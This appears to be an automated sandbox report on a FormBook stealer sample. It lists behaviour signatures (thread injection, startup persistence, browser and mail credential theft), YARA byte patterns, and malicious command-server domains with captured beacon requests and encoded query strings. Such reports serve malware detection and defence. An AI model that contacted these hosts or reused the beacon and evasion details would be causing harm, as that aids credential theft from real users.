Edit tour

Windows Analysis Report
N2sgk6jMa2.exe

Overview

General Information

Sample name:	N2sgk6jMa2.exe renamed because original name is a hash value
Original sample name:	b94b6c27e410388cd4e7dfeb352b75ce.exe
Analysis ID:	1454063
MD5:	b94b6c27e410388cd4e7dfeb352b75ce
SHA1:	57252799717e32bccfd57d674c6d44328a17b148
SHA256:	26833834efb8d0ff6dfea4c7cd8a66b89fb8c04e5142a0a077e0ded715098232
Tags:	32exetrojan
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Creates executable files without a name

Drops VBS files to the startup folder

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Connects to several IPs in different countries

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Startup Folder File Write

Sigma detected: Uncommon Svchost Parent Process

Stores files to the Windows start menu directory

Switches to a custom stack to bypass stack traces

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

N2sgk6jMa2.exe (PID: 7252 cmdline: "C:\Users\user\Desktop\N2sgk6jMa2.exe" MD5: B94B6C27E410388CD4E7DFEB352B75CE)

.exe (PID: 7268 cmdline: "C:\Users\user\Desktop\N2sgk6jMa2.exe" MD5: B94B6C27E410388CD4E7DFEB352B75CE)

svchost.exe (PID: 7296 cmdline: "C:\Users\user\Desktop\N2sgk6jMa2.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

fIuefTlcmxsHvlw.exe (PID: 5600 cmdline: "C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

netbtugc.exe (PID: 7388 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)

fIuefTlcmxsHvlw.exe (PID: 3264 cmdline: "C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 7708 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.4246901497.0000000002E30000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4246901497.0000000002E30000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.4248136482.0000000003400000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4248136482.0000000003400000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.1935910510.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1935910510.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.1936252078.0000000002B70000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1936252078.0000000002B70000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.4248067073.00000000033C0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4248067073.00000000033C0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.4248204610.00000000043F0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.4248204610.00000000043F0000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x15723c:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1408db:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.4250197386.00000000055A0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.4250197386.00000000055A0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x83200:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x6c89f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.1937067974.0000000004B50000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1937067974.0000000004B50000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x15723c:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1408db:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2d063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16702:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Sigma Signatures

System Summary

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\directory\.exe, ProcessId: 7268, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup.vbs

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\N2sgk6jMa2.exe", CommandLine: "C:\Users\user\Desktop\N2sgk6jMa2.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\N2sgk6jMa2.exe", ParentImage: C:\Users\user\AppData\Local\directory\.exe, ParentProcessId: 7268, ParentProcessName: .exe, ProcessCommandLine: "C:\Users\user\Desktop\N2sgk6jMa2.exe", ProcessId: 7296, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\N2sgk6jMa2.exe", CommandLine: "C:\Users\user\Desktop\N2sgk6jMa2.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\N2sgk6jMa2.exe", ParentImage: C:\Users\user\AppData\Local\directory\.exe, ParentProcessId: 7268, ParentProcessName: .exe, ProcessCommandLine: "C:\Users\user\Desktop\N2sgk6jMa2.exe", ProcessId: 7296, ProcessName: svchost.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.empowermedeco.com/fo8o/	Avira URL Cloud: Label: malware
Source: http://www.kasegitai.tokyo/fo8o/?aZ=0LNqIGaAWMhMIMLOoFJdlTy9f3bq+Isr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8r/Gn91MhhIPQbbhzQEQvbiAlH2BixgYAz94=&qD=FrMTb	Avira URL Cloud: Label: malware
Source: http://www.empowermedeco.com/fo8o/?aZ=mxnR+iHPFb8HZiaGfeL/C2cRfJ+ne5kRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfBV1+IPAGotTT7HDcUO7JjOgJKpj6i9KOMs=&qD=FrMTb	Avira URL Cloud: Label: malware
Source: http://www.shenzhoucui.com/fo8o/?qD=FrMTb&aZ=CKPof6WmPR8MjyGnH4DbgoSrXD0BQRGHH5TS1bRPLOh5omNg/qt+/6bvCL2pthCxfTLrkj/U4P5Lt/hzCRdBUQctCnxeEn1N6dSVAag1SvMAJrrC6MpwI5I=	Avira URL Cloud: Label: malware
Source: https://www.empowermedeco.com/fo8o/?aZ=mxnR	Avira URL Cloud: Label: malware
Source: http://www.660danm.top/fo8o/	Avira URL Cloud: Label: malware
Source: http://www.magmadokum.com/fo8o/	Avira URL Cloud: Label: malware
Source: http://www.kasegitai.tokyo/fo8o/	Avira URL Cloud: Label: malware
Source: http://www.shenzhoucui.com/fo8o/	Avira URL Cloud: Label: malware
Source: http://www.elettrosistemista.zip/fo8o/	Avira URL Cloud: Label: malware
Source: http://www.660danm.top/fo8o/?qD=FrMTb&aZ=tDTx8bBUOSgexthKGxTOnUCc0VRR9qJVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrOeLTXcC8Q+8Ca4ZDKyYIpPg4REm9D5WLqa0=	Avira URL Cloud: Label: malware
Source: http://www.elettrosistemista.zip/fo8o/?qD=FrMTb&aZ=bO1UBvtoHFNUmlWB4HLJpEjmeTUqQxU1qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLzFMa6Onx1WMpNg/TOHpJ+sdeDHYknqJlyE=	Avira URL Cloud: Label: malware
Source: http://www.techchains.info/fo8o/	Avira URL Cloud: Label: phishing

Multi AV Scanner detection for domain / URL

Source: empowermedeco.com	Virustotal: Detection: 11%	Perma Link
Source: www.660danm.top	Virustotal: Detection: 10%	Perma Link
Source: elettrosistemista.zip	Virustotal: Detection: 9%	Perma Link
Source: www.shenzhoucui.com	Virustotal: Detection: 9%	Perma Link
Source: www.goldenjade-travel.com	Virustotal: Detection: 8%	Perma Link
Source: www.b301.space	Virustotal: Detection: 6%	Perma Link
Source: www.magmadokum.com	Virustotal: Detection: 9%	Perma Link
Source: www.antonio-vivaldi.mobi	Virustotal: Detection: 9%	Perma Link
Source: www.techchains.info	Virustotal: Detection: 10%	Perma Link
Source: www.donnavariedades.com	Virustotal: Detection: 6%	Perma Link
Source: www.empowermedeco.com	Virustotal: Detection: 5%	Perma Link
Source: www.k9vyp11no3.cfd	Virustotal: Detection: 8%	Perma Link
Source: www.rssnewscast.com	Virustotal: Detection: 9%	Perma Link
Source: www.elettrosistemista.zip	Virustotal: Detection: 7%	Perma Link
Source: http://www.empowermedeco.com/fo8o/	Virustotal: Detection: 8%	Perma Link
Source: http://www.660danm.top/fo8o/	Virustotal: Detection: 10%	Perma Link
Source: http://www.rssnewscast.com/fo8o/	Virustotal: Detection: 7%	Perma Link
Source: http://www.magmadokum.com/fo8o/	Virustotal: Detection: 9%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\directory\.exe

ReversingLabs: Detection: 52%

Multi AV Scanner detection for submitted file

Source: N2sgk6jMa2.exe	Virustotal: Detection: 50%			Perma Link
Source: N2sgk6jMa2.exe	ReversingLabs: Detection: 52%

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4246901497.0000000002E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4248136482.0000000003400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1935910510.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1936252078.0000000002B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4248067073.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4248204610.00000000043F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4250197386.00000000055A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1937067974.0000000004B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\directory\.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: N2sgk6jMa2.exe

Joe Sandbox ML: detected

Source: N2sgk6jMa2.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fIuefTlcmxsHvlw.exe, 00000003.00000000.1859889924.000000000011E000.00000002.00000001.01000000.00000005.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000000.2003656321.000000000011E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: .exe, 00000001.00000003.1797450549.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, .exe, 00000001.00000003.1796711793.0000000003DF0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1842614640.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1936576903.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1936576903.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1844295077.0000000003200000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4248486732.00000000037B0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1938445048.0000000003607000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1936233369.000000000345F000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4248486732.000000000394E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: .exe, 00000001.00000003.1797450549.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, .exe, 00000001.00000003.1796711793.0000000003DF0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1842614640.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1936576903.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1936576903.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1844295077.0000000003200000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4248486732.00000000037B0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1938445048.0000000003607000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1936233369.000000000345F000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4248486732.000000000394E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.1936398825.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1905265049.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000003.00000002.4247501802.00000000012F8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.4247312315.00000000032CE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4249071276.0000000003DDC000.00000004.10000000.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000000.2004516587.000000000316C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2223941965.000000001EFFC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.4247312315.00000000032CE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4249071276.0000000003DDC000.00000004.10000000.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000000.2004516587.000000000316C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2223941965.000000001EFFC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.1936398825.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1905265049.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000003.00000002.4247501802.00000000012F8000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D64696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00D64696
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D6C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00D6C9C7
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D6C93C FindFirstFileW,FindClose,	0_2_00D6C93C
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D6F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00D6F200
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D6F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00D6F35D
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D6F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00D6F65E
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D63A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00D63A2B
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D63D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00D63D4E
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D6BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00D6BF27
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B94696 GetFileAttributesW,FindFirstFileW,FindClose,	1_2_00B94696
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B9C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	1_2_00B9C9C7
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B9C93C FindFirstFileW,FindClose,	1_2_00B9C93C
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B9F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	1_2_00B9F200
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B9F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	1_2_00B9F35D
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B9F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	1_2_00B9F65E
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B93A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	1_2_00B93A2B
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B93D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	1_2_00B93D4E
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B9BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	1_2_00B9BF27

Networking

Performs DNS queries to domains with low reputation

Source:

DNS query: www.joyesi.xyz

Source: unknown

Network traffic detected: IP country count 11

Source: Joe Sandbox View	IP Address: 91.195.240.94 91.195.240.94
Source: Joe Sandbox View	IP Address: 116.50.37.244 116.50.37.244

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe

Code function: 0_2_00D725E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_00D725E2

Source: global traffic	HTTP traffic detected: GET /fo8o/?qD=FrMTb&aZ=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.3xfootball.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?aZ=0LNqIGaAWMhMIMLOoFJdlTy9f3bq+Isr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8r/Gn91MhhIPQbbhzQEQvbiAlH2BixgYAz94=&qD=FrMTb HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.kasegitai.tokyoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
